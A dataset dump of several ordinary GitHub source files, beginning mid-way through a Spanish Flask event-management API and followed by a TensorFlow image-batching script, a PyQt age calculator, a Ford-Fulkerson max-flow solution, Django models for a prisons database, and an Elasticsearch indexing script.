\"\"):\n base.child(\"actividad\").child(\n actividad.key()).update({\"nombre\": nombre})\n if (fecha != \"\"):\n base.child(\"actividad\").child(actividad.key()).update(\n {\"fecha\": fecha})\n if (hora_inicio != \"\"):\n base.child(\"actividad\").child(actividad.key()).update(\n {\"hora_inicio\": hora_inicio})\n if (hora_fin != \"\"):\n base.child(\"actividad\").child(actividad.key()).update(\n {\"hora_fin\": hora_fin})\n if (descripcion != \"\"):\n base.child(\"actividad\").child(actividad.key()).update(\n {\"descripcion\": descripcion})\n\n return jsonify({\"message\": \"La actividad se edito exitosamente\"})\n\n return jsonify({\"message\": \"La actividad no se ha encontrado\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al editar la actividad\"})\n\n\n# Esta función elimina una actividad\n@api.route('/delete_actividad', methods=[\"POST\"])\ndef delete_actividad():\n data = request.get_json()\n evento_id = data[\"evento_id\"]\n actividad_id = data[\"actividad_id\"]\n\n try:\n actividades = base.child(\"actividad\").get()\n for actividad in actividades.each():\n if ((actividad.val()[\"evento_id\"] == evento_id) and (actividad.val()[\"actividad_id\"] == actividad_id)):\n base.child(\"actividad\").child(actividad.key()).remove()\n return jsonify({\"message\": \"La actividad se elimino exitosamente\"})\n\n return jsonify({\"message\": \"La actividad no existe\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al eliminar la actividad\"})\n\n\n############################################ Reservas #############################################\n\n# Esta función crea una asignación para un colaborador\n@api.route('/reservar_evento', methods=[\"POST\"])\ndef reservar_evento():\n data = request.get_json()\n correo = data[\"correo\"]\n flag = data[\"flag\"]\n evento_id = data[\"evento_id\"]\n\n if flag == 'inscripcion':\n nueva_asignacion = {\n \"correo\": correo,\n \"evento_id\": evento_id,\n \"estado_reserva\": \"activo\"\n }\n else: \n nueva_asignacion = {\n \"correo\": correo,\n \"evento_id\": evento_id,\n \"estado_reserva\": \"cancelado\"\n }\n try:\n reservas = base.child(\"reserva\").get()\n for reserva in reservas.each():\n if ((reserva.val()[\"correo\"] == correo) and (reserva.val()[\"evento_id\"] == evento_id)):\n base.child(\"reserva\").child(reserva.key()).update(\n {\"estado_reserva\": nueva_asignacion[\"estado_reserva\"]})\n message = \"Se modificó la reserva del evento: \"\n message = message + str(nueva_asignacion[\"evento_id\"])\n enviarCorreo(correo, message.encode('utf-8'))\n return jsonify({\"message\": \"La reserva se modifico exitosamente\"})\n \n\n eventos = base.child(\"evento\").get()\n for evento in eventos.each():\n if (evento.val()[\"evento_id\"] == evento_id):\n capacidad = int(evento.val()[\"capacidad\"]) - 1\n if capacidad == -1:\n return jsonify({\"message\": \"No hay cupos disponibles\"})\n base.child(\"evento\").child(evento.key()).update(\n {\"capacidad\": str(capacidad)})\n\n message = \"Se creó la reserva del evento: \"\n message = message + str(nueva_asignacion[\"evento_id\"])\n enviarCorreo(correo, message.encode('utf-8'))\n base.child(\"reserva\").push(nueva_asignacion)\n return jsonify({\"message\": \"La reserva se registro exitosamente\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al agregar la reserva\"})\n\n############################################ Propuestas #############################################\n#esta funcion crea una nueva propuesta\n@api.route('/enviar_propuesta', methods=[\"POST\"])\ndef enviar_propuesta():\n data = request.get_json()\n evento_id = data[\"evento_id\"]\n correo = data[\"correo\"]\n propuesta = data[\"propuesta\"]\n\n nueva_propuesta = {\n \"evento_id\": evento_id,\n \"correo\": correo,\n \"propuesta\": propuesta,\n \"es_aprobado\": \"pending\"\n }\n\n try:\n # Valida si la asociación ya fue registrada \n propuestas = base.child(\"propuesta\").get()\n j=0\n for i in propuestas.each():\n j+=1\n nueva_propuesta[\"propuesta_id\"] = str(j+1)\n base.child(\"propuesta\").push(nueva_propuesta)\n return jsonify({\"message\": \"La propuesta se envio exitosamente\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al enviar la propuesta\"})\n\n#Esta función es un get de las propuestas\n@api.route('/get_propuestas', methods=[\"POST\"])\ndef get_propuestas():\n try:\n propuestas = base.child(\"propuesta\").get().val()\n lista_propuestas = list(propuestas.values())\n return jsonify(lista_propuestas)\n\n except:\n return jsonify({\"message\": \"Hubo un error al consultar las propuestas\"})\n\n# Esta función es para decidir si se aprueba o no la proposición\n@api.route('/evaluar_propuesta', methods=[\"POST\"])\ndef evaluar_propuesta():\n data = request.get_json()\n propuesta_id = data[\"propuesta_id\"]\n es_aprobado = data[\"es_aprobado\"]\n\n nueva_asociacion = {\n \"propuesta_id\": propuesta_id,\n \"es_aprobado\": es_aprobado\n }\n print(es_aprobado)\n try:\n propuestas = base.child(\"propuesta\").get()\n for propuesta in propuestas.each():\n if (propuesta.val()[\"propuesta_id\"] == propuesta_id):\n if (es_aprobado != \"\"):\n base.child(\"propuesta\").child(propuesta.key()).update(\n {\"es_aprobado\": es_aprobado})\n print(es_aprobado)\n\n return jsonify({\"message\": \"La propuesta se actualizó exitosamente\"})\n\n return jsonify({\"message\": \"La propuesta no existe\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al actualizar la propuesta\"})\n\n############################################ Foro #############################################\n\n# Esta función es un envío de mensaje al foro\n@api.route('/enviar_mensaje', methods=[\"POST\"])\ndef enviar_mensaje():\n data = request.get_json()\n correo = data[\"correo\"]\n mensaje = data[\"mensaje\"]\n\n nuevo_mensaje = {\n \"correo\": correo,\n \"mensaje\": mensaje\n }\n\n try:\n base.child(\"mensaje\").push(nuevo_mensaje)\n return jsonify({\"message\": \"El mensaje se envio exitosamente\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al enviar el mensaje\"})\n\n\n#Esta función es un get de los mensajes\n@api.route('/get_mensajes', methods=[\"POST\"])\ndef get_mensajes():\n try:\n mensajes = base.child(\"mensaje\").get().val()\n lista_mensajes = list(mensajes.values())\n return jsonify(lista_mensajes)\n\n except:\n return jsonify({\"message\": \"Hubo un error al consultar los mensajes\"})\n\n############################################ Estadísticas #############################################\n# Un get de los eventos y el total de reservas que tuvieron\n# FALTA sacar los stats\n@api.route('/participacion_eventos', methods=[\"POST\"])\ndef participacion_eventos():\n try:\n lista_participacion = []\n eventos = base.child(\"evento\").get()\n reservas = base.child(\"reserva\").get()\n for evento in eventos.each():\n participacion_counter = 0\n for reserva in reservas.each():\n if reserva.val()[\"evento_id\"] == evento.val()[\"evento_id\"]:\n participacion_counter += 1\n \n participacion = {\n \"nombre\": evento.val()[\"nombre\"],\n \"total_participantes\": participacion_counter\n }\n lista_participacion.append(participacion)\n return jsonify(lista_participacion)\n\n except:\n return jsonify({\"message\": \"Hubo un error al consultar la participacion\"})\n \n#Un get de los eventos y el total de likes y dislikes que tuvieron\n#FALTA sacar los stats\n@api.route('/evaluacion_eventos', methods=[\"POST\"])\ndef evaluacion_eventos():\n try:\n lista_evaluacion = []\n eventos = base.child(\"evento\").get()\n feedbacks = base.child(\"feedback\").get()\n for evento in eventos.each():\n like_counter = 0\n dislike_counter = 0\n\n for feedback in feedbacks.each():\n if feedback.val()[\"evento_id\"] == evento.val()[\"evento_id\"]:\n if feedback.val()[\"is_like\"] ==\"true\":\n like_counter += 1\n else:\n dislike_counter += 1\n\n evaluacion = {\n \"nombre\": evento.val()[\"nombre\"],\n \"total_likes\": like_counter,\n \"total_dislikes\": dislike_counter\n }\n lista_evaluacion.append(evaluacion)\n return jsonify(lista_evaluacion)\n\n except:\n return jsonify({\"message\": \"Hubo un error al consultar la participacion\"})\n\n\n############################################ Feedback #############################################\n\n@api.route('/enviar_feedback', methods=[\"POST\"])\ndef enviar_feedback():\n data = request.get_json()\n correo = data[\"correo\"]\n mensaje = data[\"mensaje\"]\n is_like = data[\"is_like\"]\n evento_id = data[\"evento_id\"]\n\n\n nuevo_feedback = {\n \"correo\": correo,\n \"is_like\": is_like,\n \"evento_id\": evento_id,\n \"mensaje\": mensaje\n }\n\n try:\n base.child(\"feedback\").push(nuevo_feedback)\n return jsonify({\"message\": \"El feedback se envio exitosamente\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al enviar el feedback\"})\n\n#Esta función es un get de los feedback\n@api.route('/get_feedbacks', methods=[\"POST\"])\ndef get_feedbacks():\n try:\n feedbacks = base.child(\"feedback\").get().val()\n lista_feedbacks = list(feedbacks.values())\n return jsonify(lista_feedbacks)\n\n except:\n return jsonify({\"message\": \"Hubo un error al consultar los feedbacks\"})\n\n\n\n@api.route(\"/\")\ndef hello():\n return \"Welcome to Eventos-Tec\"\n\n\nif __name__ == \"__main__\":\n api.run(debug=True)\n","repo_name":"notthatdood/Eventos-Tec","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":30222,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"30845435183","text":"# 读取是【线程】和【队列】合作的流程\n# 主线程执行main,子线程执行def\n\nimport tensorflow as tf\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\ndef picread(file_list):\n \"\"\"\n 读取狗【图片数据】到【张量】\n :param file_list: 路径+文件名的列表,(是一个1阶张量)\n \"\"\"\n # 1. 构造文件队列(包括路径+文件名)\n file_queue = tf.train.string_input_producer(file_list)\n\n # 2. 利用【图片读取器】去【读取】文件队列的内容\n reader = tf.WholeFileReader() # 构造一个图片读取器实例\n # 默认一次读取一张图片,没有形状\n key, value = reader.read(file_queue)\n # 输出:Tensor(\"ReaderReadV2:1\", shape=(), dtype=string)\n\n # 3. 对图片数据进行解码; shape:从()变成 (?,?,?); dtype: 从string 变成 uint8\n image = tf.image.decode_jpeg(value)\n # 输出:Tensor(\"ReaderReadV2:1\", shape=(), dtype=string)\n\n # 形状必须固定才能进行批处理,不能用(?,?,?)\n # 4. 图片的形状固定、大小处理(全部统一),算法训练要求样本的特征数量一样\n # 固定 200*200 ==> [200,200]\n image_resize = tf.image.resize_images(image, [200, 200])\n # 输出:Tensor(\"batch:0\", shape=(200, 200, ?), dtype=float32)\n\n # 4.1 设置图片形状, 设置成3通道\n image_resize.set_shape([200,200,3])\n # print(image_resize)\n # 输出:Tensor(\"batch:0\", shape=(200, 200, 3), dtype=float32)\n\n # 5. 进行批处理\n # 包含tensor的列表\n # batch_size:取出的大小\n # capacity:队列的大小\n image_batch = tf.train.batch([image_resize], batch_size=10, num_threads=1,capacity=10)\n\n return image_batch\n\nif __name__ == '__main__':\n # 第一阶段:构造文件队列\n # 指定文件读取的路径\n file_name = os.listdir(\"./testA/\") # 返回的仅仅只是文件路径\n # 拼接路径+文件名, 用列表保存\n file_list = [os.path.join(\"./testA/\", file) for file in file_name]\n # print(file_list)\n\n image_batch = picread(file_list)\n # 输出4D张量:Tensor(\"batch:0\", shape=(10, 200, 200, 3), dtype=float32)\n\n # 把图片打印出来\n with tf.Session() as sess:\n\n # 创建线程回收的协调员\n coord = tf.train.Coordinator()\n\n # 需要手动开启子线程,去进行批处理读取到队列操作\n threads = tf.train.start_queue_runners(sess=sess,coord=coord)\n\n print(sess.run(image_batch))\n\n # 回收线程\n coord.request_stop()\n coord.join(threads)\n","repo_name":"BrucePython/Deep_Learning","sub_path":"05_Deep_Learning/20_图片读取流程.py","file_name":"20_图片读取流程.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"40426671741","text":"#Mostrar la edad de una persona de acuerdo al año que nació. \nimport sys\nfrom PyQt5 import uic, QtWidgets\n\nqtCreatorFile = \"Edad.ui\" # Nombre del archivo aquí.\n\nUi_MainWindow, QtBaseClass = uic.loadUiType(qtCreatorFile)\n\nclass MyApp(QtWidgets.QMainWindow, Ui_MainWindow):\n def __init__(self):\n QtWidgets.QMainWindow.__init__(self)\n Ui_MainWindow.__init__(self)\n self.setupUi(self)\n self.btnCalculo.clicked.connect(self.fn_calculo)\n self.btnLimpiar.clicked.connect(self.fn_limpiar)\n self.btnSalir.clicked.connect(self.fn_salir)\n\n def fn_calculo(self):\n \tfechaActual = int(self.txtN1.text())\n \tfecha = int(self.txtN2.text())\n \tedad = fechaActual-fecha\n \tself.txtN3.setText(str(edad))\n\n\n def fn_limpiar(self):\n \tself.txtN1.setText(\"\")\n \tself.txtN2.setText(\"\")\n \tself.txtN3.setText(\"\")\n \tself.txtN1.setFocus()\n\n\n def fn_salir(root):\n \troot.destroy()\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n window = MyApp()\n window.show()\n sys.exit(app.exec_())\n\n\n","repo_name":"ZnthA/QT_Ejercicio_semana5","sub_path":"Edad.py","file_name":"Edad.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"16101391849","text":"from collections import defaultdict \n\n# This class represents a directed graph using adjacency matrix representation \n# Implementation From Geeksforgeeks.org\nclass Graph: \n \n def __init__(self,graph): \n self.graph = graph # residual graph \n self. ROW = len(graph) \n \n def BFS(self,s, t, parent): \n \n # Mark all the vertices as not visited \n visited =[False]*(self.ROW) \n \n # Create a queue for BFS \n queue=[] \n \n # Mark the source node as visited and enqueue it \n queue.append(s) \n visited[s] = True\n \n # Standard BFS Loop \n while queue: \n \n #Dequeue a vertex from queue and print it \n u = queue.pop(0) \n \n # Get all adjacent vertices of the dequeued vertex u \n # If a adjacent has not been visited, then mark it \n # visited and enqueue it \n for ind, val in enumerate(self.graph[u]): \n if visited[ind] == False and val > 0 : \n queue.append(ind) \n visited[ind] = True\n parent[ind] = u \n \n # If we reached sink in BFS starting from source, then return \n # true, else false \n return True if visited[t] else False\n \n \n # Returns tne maximum flow from s to t in the given graph \n def FordFulkerson(self, source, sink): \n \n # This array is filled by BFS and to store path \n parent = [-1]*(self.ROW) \n \n max_flow = 0 # There is no flow initially \n \n # Augment the flow while there is path from source to sink \n while self.BFS(source, sink, parent) : \n \n # Find minimum residual capacity of the edges along the \n # path filled by BFS. Or we can say find the maximum flow \n # through the path found. \n path_flow = float(\"Inf\") \n s = sink \n while(s != source): \n path_flow = min (path_flow, self.graph[parent[s]][s]) \n s = parent[s] \n \n # Add path flow to overall flow \n max_flow += path_flow \n \n # update residual capacities of the edges and reverse edges \n # along the path \n v = sink \n while(v != source): \n u = parent[v] \n self.graph[u][v] -= path_flow \n self.graph[v][u] += path_flow \n v = parent[v] \n \n return max_flow \n \nnum_cases = int(input())\n\nfor c in range(num_cases):\n n, m = list(map(int, input().split()))\n\n dim = (1+ 6 + m + 1)\n\n graph = [[0]*dim for i in range(dim)]\n \n # Source to t-shirts\n graph[0][1:7] = [n//6]*6\n\n acc_sizes = []\n\n # Sizes:\n # XS, S, M, L, XL, XXL\n index = {\n \"XS\": 1,\n \"S\": 2,\n \"M\": 3,\n \"L\": 4,\n \"XL\": 5,\n \"XXL\": 6\n }\n for i in range(m):\n tshirts = input().split()\n for t in tshirts:\n graph[index[t]][7+i] = 1\n graph[7+i][dim-1] = 1\n\n\n g = Graph(graph) \n\n source, sink = 0, dim-1\n max_flow = g.FordFulkerson(source, sink)\n \n if max_flow == m:\n print(\"YES\")\n else:\n print(\"NO\")\n","repo_name":"sajjadt/uvapy","sub_path":"graphs/p11045.py","file_name":"p11045.py","file_ext":"py","file_size_in_byte":3151,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"57"} +{"seq_id":"29434584053","text":"\"\"\"\nEditable Types\n\"\"\"\n\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\nimport core_types.models\nimport core_types.managers\n\n\nclass Prison(core_types.models.PublishableMixin, models.Model):\n name = models.CharField(\n verbose_name=_('Name'),\n max_length=255)\n\n address = models.TextField(\n verbose_name=_('Address'),\n max_length=255)\n\n dean_name = models.CharField(\n verbose_name=_('Dean Name'),\n max_length=255,\n null=True,\n blank=True)\n\n dean_email = models.EmailField(\n verbose_name=_('Dean E-mail'),\n max_length=255,\n blank=True,\n null=True)\n\n dean_phone = models.CharField(\n verbose_name=_('Dean Telephone'),\n max_length=255,\n null=True,\n blank=True)\n\n capacity = models.PositiveIntegerField(\n verbose_name=_('Capacity'),\n null=True,\n blank=True)\n\n capacity_is_estimate = models.BooleanField(\n verbose_name=_('Estimated Capacity'),\n default=False)\n\n latitude = models.FloatField(\n verbose_name=_('Latitude'),\n null=True,\n blank=True)\n\n longitude = models.FloatField(\n verbose_name=_('Longitude'),\n null=True,\n blank=True)\n\n opened_year = models.IntegerField(\n verbose_name=_('Year Of Opening'),\n null=True,\n blank=True)\n\n opened_month = models.IntegerField(\n verbose_name=_('Month Of Opening'),\n null=True,\n blank=True)\n\n opened_day = models.IntegerField(\n verbose_name=_('Day Of Opening'),\n null=True,\n blank=True)\n\n opened_year_fa = models.IntegerField(\n verbose_name=_('Persian Year Of Opening'),\n null=True,\n blank=True)\n\n opened_month_fa = models.IntegerField(\n verbose_name=_('Persian Month Of Opening'),\n null=True,\n blank=True)\n\n opened_day_fa = models.IntegerField(\n verbose_name=_('Persian Day Of Opening'),\n null=True,\n blank=True)\n\n ADMINISTERED_BY_CHOICES = [\n ('moi', _('Ministry of Information')),\n ('police', _('Police')),\n ('irgc', _('IRGC')),\n ('pdotj', _('Prisons Division of the Judiciary'))\n ]\n administered_by = models.CharField(\n verbose_name=_('Administered By'),\n choices=ADMINISTERED_BY_CHOICES,\n max_length=8,\n null=True,\n blank=True)\n\n physical_structure = models.TextField(\n verbose_name=_('Physical Structure'),\n null=True,\n blank=True)\n\n size_and_density = models.TextField(\n verbose_name=_('Size And Density'),\n null=True,\n blank=True)\n\n medicine_and_nutrition = models.TextField(\n verbose_name=_('Medicine And Nutrition'),\n null=True,\n blank=True)\n\n facilities = models.ManyToManyField(\n 'PrisonFacility',\n verbose_name=_('Prison Facility'),\n blank=True)\n\n picture = models.ImageField(\n verbose_name=_('Prison Picture'),\n upload_to='prison_pics',\n null=True,\n blank=True)\n\n bio = models.TextField(\n verbose_name=_('Bio'),\n null=True,\n blank=True)\n\n explanation_en = models.TextField(\n verbose_name=_('Any extra explanation needed to be added to this '\n 'prisoner'),\n null=True,\n blank=True)\n\n explanation_fa = models.TextField(\n verbose_name=_('Any extra explanation needed to be added to this '\n 'prisoner'),\n null=True,\n blank=True)\n\n explanation_aea_en = models.TextField(\n verbose_name=_('Any extra explanation needed to be added to this '\n 'prisoner'),\n null=True,\n blank=True)\n\n explanation_aea_fa = models.TextField(\n verbose_name=_('Any extra explanation needed to be added to this '\n 'prisoner'),\n null=True,\n blank=True)\n\n objects = models.Manager()\n published_objects = core_types.managers.PublishedManager()\n\n class Meta:\n verbose_name = _('Prison')\n\n def __unicode__(self):\n return u'%s %s: %s' % (\n type(self).__name__,\n self.pk,\n self.name)\n\n # To be used to calculate prisons mistreatments\n # def update_mistreatment(self):\n # \"\"\"\n # Update number of mistreatments for this judge\n # \"\"\"\n # from prisoners.models import PrisonerArrest, PrisonerDetention\n # from report.models import Report, ReportDetention\n\n # arrests = PrisonerArrest.published_objects.filter(\n # id__in=self.sentences.filter(is_published=True).values_list('arrest__id'))\n # self.mistreatments_count = PrisonerDetention.published_objects.filter(\n # arrest_id__in=arrests).aggregate(\n # total_mistreatments=Count('treatment'))['total_mistreatments']\n\n # reports = Report.published_objects.filter(\n # id__in=self.report_sentences.filter(is_published=True).values_list('report__id'))\n # self.aea_mistreatments_count = ReportDetention.published_objects.filter(\n # report_id__in=reports).aggregate(\n # total_mistreatments=Count('treatment'))['total_mistreatments']\n\n # self.save()\n\n @classmethod\n def prefetch_queryset(cls, queryset):\n \"\"\"\n Update a queryset to prefetch all related data for a prison.\n \"\"\"\n return (queryset\n .prefetch_related('facilitylinks')\n .prefetch_related('facilities')\n .prefetch_related('files')\n .prefetch_related('quotes')\n .prefetch_related('sources')\n .prefetch_related('timeline')\n .prefetch_related('comments'))\n\n\nclass PrisonComment(core_types.models.Comment):\n prison = models.ForeignKey(\n 'Prison',\n related_name='comments')\n\n\nclass PrisonSource(core_types.models.Source):\n prison = models.ForeignKey(\n 'Prison',\n related_name='sources')\n\n class Meta:\n unique_together = [\n ('prison', 'name'),\n ]\n\n\nclass PrisonQuote(core_types.models.Quote):\n prison = models.ForeignKey(\n 'Prison',\n related_name='quotes')\n\n\nclass PrisonFile(core_types.models.File):\n prison = models.ForeignKey(\n 'Prison',\n related_name='files')\n\n FILE_TYPE_CHOICES = [\n ('visual_records', _('Visual records')),\n ('mistreatments', _('Mistreatments')),\n ('testimonials', _('Testimonials')),\n ('campaigns', _('Campaigns')),\n ]\n\n file_type = models.CharField(\n choices=FILE_TYPE_CHOICES,\n max_length=16,\n )\n\n\nclass PrisonTimeline(core_types.models.Timeline):\n prison = models.ForeignKey(\n 'Prison',\n related_name='timeline')\n\n\nclass PrisonFacility(core_types.models.Choice):\n class Meta:\n verbose_name = _('Prison Facility')\n\n\nclass PrisonFacilityLink(core_types.models.PublishableMixin, models.Model):\n prison = models.ForeignKey(\n 'Prison',\n related_name='facilitylinks')\n facility = models.ForeignKey(\n 'PrisonFacility')\n description = models.CharField(max_length=255, null=True, blank=True)\n","repo_name":"u4i-admin2/IPA","sub_path":"prisons/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"71925111859","text":"\"\"\"\n@Project : text-classification-cnn-rnn\n@Module : es_index.py\n@Author : Deco [deco@cubee.com]\n@Created : 5/30/18 11:56 AM\n@Desc : \n\"\"\"\n# make sure ES is up and running\nimport requests\nres = requests.get('http://localhost:9200')\nprint(res.content)\n\n#connect to our cluster\nfrom elasticsearch import Elasticsearch\nes = Elasticsearch([{'host': 'localhost', 'port': 9200}])\n\n# let's iterate over swapi people documents and index them\nimport json\n\nr = requests.get('http://localhost:9200')\ni = 1\nwhile r.status_code == 200:\n r = requests.get('http://swapi.co/api/people/' + str(i))\n es.index(index='sw', doc_type='people', id=i, body=json.loads(r.content))\n i = i + 1\n\nprint(i)\n\n\nes.search(index=\"sw\", body={\"query\": {\"match\": {'name': 'Darth Vader'}}})\n","repo_name":"arfu2016/nlp","sub_path":"nlp_models/elasticSearch/es_index.py","file_name":"es_index.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"}